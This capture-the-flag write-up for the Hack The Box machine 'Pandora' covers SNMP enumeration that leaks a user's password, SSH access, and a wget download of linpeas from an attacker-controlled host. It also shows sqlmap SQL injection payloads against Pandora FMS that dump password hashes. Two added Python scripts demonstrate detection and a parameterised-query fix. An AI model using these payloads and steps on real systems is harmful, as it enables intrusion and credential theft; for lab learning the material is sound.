HTB - Pandora


Nmap Scan

Let's perform an nmap scan on the target machine:

┌──(kaliaidenpearce369)-[~]
└─$ nmap -sC -sV -A 10.10.11.136                     
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 10:51 EDT
Nmap scan report for 10.10.11.136
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.09 seconds

Scanning a wider port range for other services:

┌──(kaliaidenpearce369)-[~]
└─$ nmap -p1-10000 -T4 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 10:53 EDT
Warning: 10.10.11.136 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.136
Host is up (0.21s latency).
Not shown: 9995 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
1022/tcp filtered exp2
3996/tcp filtered abcsoftware
5091/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 149.09 seconds

So SSH and HTTP are the only services running on this machine.

Enumeration

We can't use SSH yet because we don't know any credentials.

Since an HTTP service is running, let's enumerate it.

After browsing through the static web page,

I found that I'm able to pass request parameters to the email form, but that doesn't lead anywhere.

And there is a hint on the webpage suggesting that we create a hostname entry.


Let's add the hostname panda.htb to our /etc/hosts file and scan again:

┌──(kaliaidenpearce369)-[~]
└─$ nmap -sC -sV -A panda.htb      
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 11:13 EDT
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.13 seconds
                                                                                                                                                             
┌──(kaliaidenpearce369)-[~]
└─$ nmap -p1-10000 -T4 panda.htb   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 11:15 EDT
Warning: 10.10.11.136 giving up on port because retransmission cap hit (6).
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.21s latency).
Not shown: 9995 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
213/tcp  filtered ipx
283/tcp  filtered rescap
7753/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 133.54 seconds

Scanning the hostname gives the same results.

By default nmap scans only TCP ports, so let's scan UDP ports as well:

┌──(kaliaidenpearce369)-[~]
└─$ sudo nmap -p1-300 -T4 panda.htb -sU
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 11:25 EDT
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.26s latency).
Not shown: 284 closed udp ports (port-unreach)
PORT    STATE         SERVICE
21/udp  open|filtered ftp
72/udp  open|filtered netrjs-2
73/udp  open|filtered netrjs-3
84/udp  open|filtered ctf
161/udp open          snmp
165/udp open|filtered xns-courier
174/udp open|filtered mailq
202/udp open|filtered at-nbp
204/udp open|filtered at-echo
209/udp open|filtered tam
215/udp open|filtered softpc
260/udp open|filtered openport
261/udp open|filtered nsiiops
269/udp open|filtered manet
275/udp open|filtered unknown
286/udp open|filtered fxp

Nmap done: 1 IP address (1 host up) scanned in 300.09 seconds

The SNMP service (161/udp) is open.

Enumerating SNMP

Since SNMP runs over UDP, let's use snmpwalk with the default "public" community string to enumerate what the agent exposes:

┌──(kaliaidenpearce369)-[~]
└─$ snmpwalk -v 1 -c public 10.10.11.136 > snmp-enum.txt

...

┌──(kaliaidenpearce369)-[~]
└─$ cat snmp-enum.txt  -n | grep '\-u'
   739  iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.4.0-91-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0 maybe-ubiquity
  1279  iso.3.6.1.2.1.25.4.2.1.2.517 = STRING: "systemd-udevd"
  1689  iso.3.6.1.2.1.25.4.2.1.4.517 = STRING: "/lib/systemd/systemd-udevd"
  1735  iso.3.6.1.2.1.25.4.2.1.5.1 = STRING: "maybe-ubiquity"
  1914  iso.3.6.1.2.1.25.4.2.1.5.898 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
  1916  iso.3.6.1.2.1.25.4.2.1.5.902 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
  1923  iso.3.6.1.2.1.25.4.2.1.5.1100 = STRING: "-u daniel -p HotelBabylon23"

Alternatively, we can use the Metasploit snmp_enum module to perform the SNMP enumeration:

msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.11.136
RHOSTS => 10.10.11.136
msf6 auxiliary(scanner/snmp/snmp_enum) > run

[+] 10.10.11.136, Connected.

[*] System information:

Host IP                       : 10.10.11.136
Hostname                      : pandora
Description                   : Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
Contact                       : Daniel
Location                      : Mississippi
Uptime snmp                   : 01:10:29.61
Uptime system                 : 01:10:16.49
System date                   : 2022-3-30 16:05:12.0

[*] Network information:

IP forwarding enabled         : no
Default TTL                   : 64
TCP segments received         : 176958
TCP segments sent             : 178677
TCP segments retrans          : 1338
Input datagrams               : 184979
Delivered datagrams           : 184979
Output datagrams              : 187172

...

672                 unknown             ext4-rsv-conver                                             
686                 runnable            systemd-resolve     /lib/systemd/systemd-resolved                    
687                 runnable            systemd-timesyn     /lib/systemd/systemd-timesyncd                    
696                 runnable            VGAuthService       /usr/bin/VGAuthService                    
697                 runnable            vmtoolsd            /usr/bin/vmtoolsd                       
757                 runnable            accounts-daemon     /usr/lib/accountsservice/accounts-daemon                    
758                 runnable            dbus-daemon         /usr/bin/dbus-daemon--system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
762                 runnable            irqbalance          /usr/sbin/irqbalance--foreground        
766                 runnable            networkd-dispat     /usr/bin/python3    /usr/bin/networkd-dispatcher --run-startup-triggers
767                 runnable            rsyslogd            /usr/sbin/rsyslogd  -n -iNONE           
772                 runnable            systemd-logind      /lib/systemd/systemd-logind                    
773                 runnable            udisksd             /usr/lib/udisks2/udisksd                    
828                 runnable            polkitd             /usr/lib/policykit-1/polkitd--no-debug          
870                 runnable            cron                /usr/sbin/cron      -f                  
880                 runnable            cron                /usr/sbin/CRON      -f                  
898                 runnable            sh                  /bin/sh             -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
901                 runnable            atd                 /usr/sbin/atd       -f                  
902                 running             snmpd               /usr/sbin/snmpd     -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid
903                 runnable            sshd                sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups                    
959                 runnable            agetty              /sbin/agetty        -o -p -- \u --noclear tty1 linux
968                 runnable            apache2             /usr/sbin/apache2   -k start            
1017                runnable            mysqld              /usr/sbin/mysqld                        
1018                runnable            apache2             /usr/sbin/apache2   -k start            
1019                runnable            apache2             /usr/sbin/apache2   -k start            
1100                runnable            host_check          /usr/bin/host_check -u daniel -p HotelBabylon23
1189                runnable            apache2             /usr/sbin/apache2   -k start            
1209                runnable            apache2             /usr/sbin/apache2   -k start            
1215                runnable            apache2             /usr/sbin/apache2   -k start            
1502                unknown             kworker/1:0-events                                          
1831                runnable            apache2             /usr/sbin/apache2   -k start            
1842                runnable            apache2             /usr/sbin/apache2   -k start            
2064                runnable            apache2             /usr/sbin/apache2   -k start            
2065                runnable            apache2             /usr/sbin/apache2   -k start            
2280                unknown             kworker/u4:1-events_power_efficient                                        
2514                unknown             kworker/u4:2-events_power_efficient                                        
2515                unknown             kworker/0:0-events                                          
2518                unknown             kworker/1:2-events                                          
2977                runnable            apache2             /usr/sbin/apache2   -k start            
3266                unknown             kworker/1:1-events                                          
3267                unknown             kworker/1:3                                                 


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

From this information we have a credential, daniel / HotelBabylon23, leaked through the command-line arguments of the host_check process that SNMP exposes in its process table.
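The leak above comes from the HOST-RESOURCES-MIB process table (hrSWRunParameters, OID .1.3.6.1.2.1.25.4.2.1.5), which hands out every process's argv to anyone who knows the community string. The following Python script is an added example, not part of the original write-up, that does the same check the grep above did but more carefully: it parses snmpwalk's output format, looks only at hrSWRunParameters rows, and flags `-u user -p secret` pairs while ignoring a `-p` whose value is a path (snmpd's own `-p /run/snmpd.pid` would otherwise be a false positive). The sample input is constructed from the walk shown above; the hrSWRunName rows for PIDs 898 and 1100 are reconstructed from the Metasploit process table, since the truncated snmpwalk output does not show them.

```python
import re

# Constructed sample input in snmpwalk's default output format. The
# hrSWRunParameters (.5) rows are copied from the walk above; the
# hrSWRunName (.2) rows for 898/1100 are taken from the Metasploit table.
SAMPLE_WALK = """\
iso.3.6.1.2.1.25.4.2.1.2.517 = STRING: "systemd-udevd"
iso.3.6.1.2.1.25.4.2.1.2.898 = STRING: "sh"
iso.3.6.1.2.1.25.4.2.1.2.902 = STRING: "snmpd"
iso.3.6.1.2.1.25.4.2.1.2.1100 = STRING: "host_check"
iso.3.6.1.2.1.25.4.2.1.4.517 = STRING: "/lib/systemd/systemd-udevd"
iso.3.6.1.2.1.25.4.2.1.5.1 = STRING: "maybe-ubiquity"
iso.3.6.1.2.1.25.4.2.1.5.898 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.902 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.1100 = STRING: "-u daniel -p HotelBabylon23"
"""

# HOST-RESOURCES-MIB hrSWRunTable columns, numeric form ('iso' is 1).
HR_SW_RUN_NAME = "1.3.6.1.2.1.25.4.2.1.2"
HR_SW_RUN_PARAMETERS = "1.3.6.1.2.1.25.4.2.1.5"

WALK_LINE_RE = re.compile(r'^(?:iso|1|\.1)\.(\S+) = STRING: "(.*)"\s*$')
USER_FLAG_RE = re.compile(r"(?:^|\s)-u\s+(\S+)")
PASS_FLAG_RE = re.compile(r"(?:^|\s)(?:-p|--password)\s+(\S+)")


def parse_walk(text):
    """Return {numeric_oid: value} for every STRING row of snmpwalk output.

    Rows that snmpwalk split across lines (no closing quote) are skipped.
    """
    rows = {}
    for line in text.splitlines():
        m = WALK_LINE_RE.match(line)
        if m:
            rows["1." + m.group(1)] = m.group(2)
    return rows


def find_credential_args(text):
    """Flag hrSWRunParameters rows that carry a '-u user -p secret' pair.

    A '-p' followed by an absolute path is treated as a pid/port file rather
    than a password, which is what excludes snmpd's own argv above.
    """
    rows = parse_walk(text)
    findings = []
    for oid, argv in rows.items():
        if not oid.startswith(HR_SW_RUN_PARAMETERS + "."):
            continue
        pw = PASS_FLAG_RE.search(argv)
        if not pw or pw.group(1).startswith("/"):
            continue
        pid = oid.rsplit(".", 1)[1]
        user = USER_FLAG_RE.search(argv)
        findings.append({
            "pid": int(pid),
            "name": rows.get(f"{HR_SW_RUN_NAME}.{pid}"),
            "user": user.group(1).strip("'\"") if user else None,
            "argv": argv,
        })
    return sorted(findings, key=lambda f: f["pid"])


if __name__ == "__main__":
    for f in find_credential_args(SAMPLE_WALK):
        print(f"pid {f['pid']} ({f['name']}): credential for user "
              f"{f['user']!r} exposed in argv: {f['argv']}")
```

Run against the sample it reports PIDs 898 and 1100, both for user daniel, and stays quiet about snmpd. Two caveats worth keeping in mind when reading the result: the stock Debian/Ubuntu snmpd.conf restricts the "public" community to a systemonly view (.1.3.6.1.2.1.1 and .1.3.6.1.2.1.25.1), so a host that answers for the full process table has been configured more permissively than the default; and a password on a command line is readable by every local user through ps or /proc anyway, so the real fix is to stop passing it as an argument, not just to close the SNMP view.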

Gaining Foothold

Let's try to log in via SSH:

┌──(kaliaidenpearce369)-[~]
└─$ ssh daniel@panda.htb                
The authenticity of host 'panda.htb (10.10.11.136)' can't be established.
ED25519 key fingerprint is SHA256:yDtxiXxKzUipXy+nLREcsfpv/fRomqveZjm6PXq9+BY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'panda.htb' (ED25519) to the list of known hosts.
daniel@panda.htb's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 30 Mar 16:16:55 UTC 2022

  System load:           0.0
  Usage of /:            63.3% of 4.87GB
  Memory usage:          8%
  Swap usage:            0%
  Processes:             231
  Users logged in:       0
  IPv4 address for eth0: 10.10.11.136
  IPv6 address for eth0: dead:beef::250:56ff:feb9:e7c7

  => /boot is using 91.8% of 219MB


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

daniel@pandora:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
daniel@pandora:~$ whoami
daniel

We don't have permission to read the user flag yet:

daniel@pandora:/home$ ls
daniel  matt
daniel@pandora:/home$ cd matt
daniel@pandora:/home/matt$ ls
user.txt
daniel@pandora:/home/matt$ cat user.txt
cat: user.txt: Permission denied
daniel@pandora:/home/matt$ 

Trying the standard privilege escalation checks, we find some SUID binaries:

daniel@pandora:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1

/usr/bin/pandora_backup looks interesting, and /usr/bin/at can be used to bypass a restricted shell:

daniel@pandora:~$ ls -l /usr/bin/at
-rwsr-sr-x 1 daemon daemon 55560 Nov 12  2018 /usr/bin/at
daniel@pandora:~$ ls -l /usr/bin/pandora_backup
-rwsr-x--- 1 root matt 16816 Dec  3 15:58 /usr/bin/pandora_backup

/usr/bin/pandora_backup is owned by root with group matt and mode -rwsr-x---, so only root and members of the matt group can run it; we need to become matt.

Downloading linpeas.sh from a web server on our attacker machine:

daniel@pandora:~$ wget http://10.10.14.5:8000/linpeas.sh
--2022-03-30 16:21:53--  http://10.10.14.5:8000/linpeas.sh
Connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 775707 (758K) [text/x-sh]
Saving to: linpeas.sh

linpeas.sh                              100%[============================================================================>] 757.53K   458KB/s    in 1.7s    

2022-03-30 16:21:55 (458 KB/s) - linpeas.sh saved [775707/775707]

Running linPEAS shows sudo version 1.8.31, which it flags as vulnerable:

daniel@pandora:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
daniel@pandora:~$ which python3
/usr/bin/python3
daniel@pandora:~$ python3 exploit_nss.py 
Traceback (most recent call last):
  File "exploit_nss.py", line 220, in <module>
    assert check_is_vuln(), "target is patched"
AssertionError: target is patched

But running the exploit shows the target is patched.

Listing the processes, there are many apache processes and a mysql process:

daniel@pandora:/var$ ps -aux

...

root         968  0.0  0.7 227944 30768 ?        Ss   14:54   0:00 /usr/sbin/apache2 -k start
mysql       1017  0.0  2.3 1710488 93948 ?       Ssl  14:54   0:03 /usr/sbin/mysqld
www-data    1018  0.0  0.3 228348 14380 ?        S    14:54   0:00 /usr/sbin/apache2 -k start
www-data    1019  0.0  0.3 228348 14380 ?        S    14:54   0:00 /usr/sbin/apache2 -k start
root        1100  0.0  0.0   2488  1388 ?        S    14:55   0:00 /usr/bin/host_check -u daniel -p HotelBabylon23
www-data    1189  0.0  0.3 228348 14384 ?        S    14:58   0:00 /usr/sbin/apache2 -k start
www-data    1209  0.0  0.3 228348 14384 ?        S    15:00   0:00 /usr/sbin/apache2 -k start
www-data    1215  0.0  0.3 228348 14384 ?        S    15:00   0:00 /usr/sbin/apache2 -k start
www-data    1831  0.0  0.3 228348 14384 ?        S    15:18   0:00 /usr/sbin/apache2 -k start
www-data    1842  0.0  0.3 228348 14384 ?        S    15:18   0:00 /usr/sbin/apache2 -k start
www-data    2064  0.0  0.3 228348 14384 ?        S    15:26   0:00 /usr/sbin/apache2 -k start
www-data    2065  0.0  0.3 228348 14384 ?        S    15:26   0:00 /usr/sbin/apache2 -k start
www-data    2977  0.0  0.3 228348 14384 ?        S    15:58   0:00 /usr/sbin/apache2 -k start

We can't access MySQL with daniel's credentials:

daniel@pandora:/var$ mysql -u daniel -p
Enter password: 
ERROR 1045 (28000): Access denied for user 'daniel'@'localhost' (using password: YES)

Given the many apache processes, enumerating /var/www shows there are two web apps on this machine:

daniel@pandora:/var/www$ ls
html  pandora
daniel@pandora:/var/www$ ls html/
assets  index.html
daniel@pandora:/var/www$ ls pandora/
index.html  pandora_console
daniel@pandora:/var/www$ cat /etc/hosts
127.0.0.1 localhost.localdomain pandora.htb pandora.pandora.htb
127.0.1.1 pandora

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Testing with curl:

daniel@pandora:/var/www$ curl localhost
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">
daniel@pandora:/var/www$ curl http://localhost/pandora_console
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://localhost/pandora_console/">here</a>.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at localhost Port 80</address>
</body></html>
daniel@pandora:/var/www$ curl http://localhost/pandora_console/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...

So there is another web app running internally.

To reach it from our machine we need port forwarding, which SSH can do:

┌──(kaliaidenpearce369)-[~]
└─$ ssh -L 8081:127.0.0.1:80 -N daniel@panda.htb   
daniel@panda.htb's password: 

Now we can access the internal web app on port 8081 of our local machine.

Privilege Escalation

We are presented with a login page.

Trying generic SQLi payloads on the login form did not work.

From the information shown on the site, it is running Pandora FMS v7.0NG742.

Let's search for exploits for this specific version:

┌──(kaliaidenpearce369)-[~]
└─$ searchsploit pandora 7.0
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Pandora 7.0NG - Remote Code Execution                                                                                      | php/webapps/47898.py
Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)                                                          | php/webapps/49046.txt
Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities                                          | php/webapps/49139.txt
Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)                                                      | php/webapps/49312.txt
Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution                                                                  | php/webapps/48280.py
PANDORAFMS 7.0 - Authenticated Remote Code Execution                                                                       | php/webapps/48064.py
PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting                                                                    | php/webapps/48707.txt
PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting                                                          | php/webapps/48700.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

But googling the exact version number, the first result is more interesting.

This version has an unauthenticated SQL injection, and since MySQL is running, let's try it.

The exploit referenced there applies to this application, and the SQLi is a union-based attack.

Let's run sqlmap on the vulnerable URI (the session_id parameter of include/chart_generator.php):

┌──(kaliaidenpearce369)-[~]
└─$ sqlmap --url="http://localhost:8081/pandora_console/include/chart_generator.php?session_id=''" --dbms=mysql --dump
        ___
       __H__                                                                                                                                                 
 ___ ___[.]_____ ___ ___  {1.6.3#stable}                                                                                                                     
|_ -| . [(]     | .'| . |                                                                                                                                    
|___|_  [']_|_|_|__,|  _|                                                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:13:19 /2022-03-30/

[13:13:19] [INFO] testing connection to the target URL
[13:13:19] [WARNING] potential permission problems detected ('Access denied')
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=koihrjg9bqn...s4mdrdmie7'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: session_id=-5176' OR 2190=2190#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: session_id=''' OR (SELECT 2464 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2464=2464,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IdPE

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: session_id=''' AND (SELECT 2215 FROM (SELECT(SLEEP(5)))mPZg)-- gdEY
---
[13:13:22] [INFO] testing MySQL
[13:13:22] [INFO] confirming MySQL
[13:13:23] [WARNING] reflective value(s) found and filtering out
[13:13:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (focal or eoan)
web application technology: PHP, Apache 2.4.41
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:13:23] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[13:13:23] [INFO] fetching current database
[13:13:23] [INFO] retrieved: 'pandora'
[13:13:23] [INFO] fetching tables for database: 'pandora'

...

The current database is named pandora.
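The root cause sqlmap is exploiting above is a session lookup that splices the session_id request parameter straight into the SQL text. The following Python script is an added example, not Pandora FMS code: it rebuilds a tiny tsessions_php table in an in-memory SQLite database (rows constructed from the dump on this page), shows the injectable lookup next to a hardened one that validates the id's shape and binds it as a query parameter, and runs the boolean-based payload sqlmap reported through both. The session id allowlist is an assumption based on the characters PHP can emit in a session id, and MySQL's `#` comment in the payload is swapped for `-- ` because SQLite does not treat `#` as a comment.

```python
import re
import sqlite3


# Constructed in-memory stand-in for the 'pandora' database. The column names
# and the two rows mirror the tsessions_php dump shown on this page.
def build_db():
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE tsessions_php "
        "(id_session TEXT PRIMARY KEY, data TEXT, last_active INTEGER)"
    )
    db.executemany(
        "INSERT INTO tsessions_php VALUES (?, ?, ?)",
        [
            ("09vao3q1dikuoi1vhcvhcjjbc6", 'id_usuario|s:6:"daniel";', 1638783555),
            ("5g6l76p4mncnest9ot5hr7opv1", 'id_usuario|s:5:"admin";', 1648660377),
        ],
    )
    return db


def lookup_session_vulnerable(db, session_id):
    """The injectable pattern: the request parameter becomes part of the SQL
    text, so a quote and an OR inside it rewrite the WHERE clause."""
    sql = f"SELECT data FROM tsessions_php WHERE id_session = '{session_id}'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


# Assumed allowlist: PHP session ids only ever contain digits, letters, ','
# and '-' (the exact alphabet depends on session.sid_bits_per_character).
SESSION_ID_RE = re.compile(r"^[A-Za-z0-9,-]{22,256}$")


def lookup_session_hardened(db, session_id):
    """Reject anything not shaped like a session id, then bind the value as a
    query parameter so the database never parses it as SQL."""
    if not SESSION_ID_RE.fullmatch(session_id):
        return None
    row = db.execute(
        "SELECT data FROM tsessions_php WHERE id_session = ?", (session_id,)
    ).fetchone()
    return row[0] if row else None


# The boolean-based payload sqlmap reported, with '#' replaced by '-- '
# for SQLite. Without a valid id it still yields another user's session.
PAYLOAD = "-5176' OR 2190=2190 -- "

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", lookup_session_vulnerable(db, PAYLOAD))  # daniel's session data
    print("hardened:  ", lookup_session_hardened(db, PAYLOAD))    # None
    print("legit id:  ", lookup_session_hardened(db, "5g6l76p4mncnest9ot5hr7opv1"))
```

The vulnerable lookup hands back the first row in the table for an id that matches nothing, which is exactly why an unauthenticated caller of chart_generator.php can end up holding someone else's session; the hardened version returns nothing for the payload and still resolves a genuine id. Parameter binding is the fix that matters; the allowlist only adds a second, independent layer.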

Dumping the tpassword_history table:

┌──(kaliaidenpearce369)-[~]
└─$ sqlmap --url="http://localhost:8081/pandora_console/include/chart_generator.php?session_id=''" --dbms=mysql -D pandora -T tpassword_history  --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.3#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:26:11 /2022-03-30/

[13:26:11] [INFO] testing connection to the target URL
[13:26:11] [WARNING] potential permission problems detected ('Access denied')
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=6up1pgja7ic...uoqu641vi3'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: session_id=-5176' OR 2190=2190#

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: session_id=''' OR (SELECT 2464 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2464=2464,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IdPE

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: session_id=''' AND (SELECT 2215 FROM (SELECT(SLEEP(5)))mPZg)-- gdEY
---
[13:26:13] [INFO] testing MySQL
[13:26:13] [INFO] confirming MySQL
[13:26:14] [WARNING] reflective value(s) found and filtering out
[13:26:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:26:14] [INFO] fetching columns for table 'tpassword_history' in database 'pandora'
[13:26:14] [INFO] resumed: 'id_pass'
[13:26:14] [INFO] resumed: 'int(10) unsigned'
[13:26:14] [INFO] resumed: 'id_user'
[13:26:14] [INFO] resumed: 'varchar(60)'
[13:26:14] [INFO] resumed: 'password'
[13:26:14] [INFO] resumed: 'varchar(45)'
[13:26:14] [INFO] resumed: 'date_begin'
[13:26:14] [INFO] resumed: 'datetime'
[13:26:14] [INFO] resumed: 'date_end'
[13:26:14] [INFO] resumed: 'datetime'
[13:26:14] [INFO] fetching entries for table 'tpassword_history' in database 'pandora'
[13:26:14] [INFO] resumed: '2021-06-11 17:28:54'
[13:26:14] [INFO] resumed: '0000-00-00 00:00:00'
[13:26:14] [INFO] resumed: '1'
[13:26:14] [INFO] resumed: 'matt'
[13:26:14] [INFO] resumed: 'f655f807365b6dc602b31ab3d6d43acc'
[13:26:14] [INFO] resumed: '2021-06-17 00:11:54'
[13:26:14] [INFO] resumed: '0000-00-00 00:00:00'
[13:26:14] [INFO] resumed: '2'
[13:26:14] [INFO] resumed: 'daniel'
[13:26:14] [INFO] resumed: '76323c174bd49ffbbdedf678f6cc89a6'
[13:26:14] [INFO] recognized possible password hashes in column 'password'
